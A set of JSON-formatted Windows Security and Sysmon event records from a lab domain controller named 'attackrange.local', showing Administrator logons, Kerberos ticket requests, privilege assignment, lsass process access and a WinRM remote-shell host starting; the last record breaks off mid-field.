{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220350,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47C52\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47c52","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220351,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220352,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220353,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220354,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47CB1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47cb1","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220355,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47CB1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x47cb1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.204","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.209\r\nProcessGuid: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nProcessId: 4388\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F8C-5F25-0000-0020B17C0400}\r\nLogonId: 0x47CB1\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.209","ProcessGuid":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F8C-5F25-0000-0020B17C0400}","LogonId":"0x47cb1","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.204\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nTargetProcessId: 4388\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 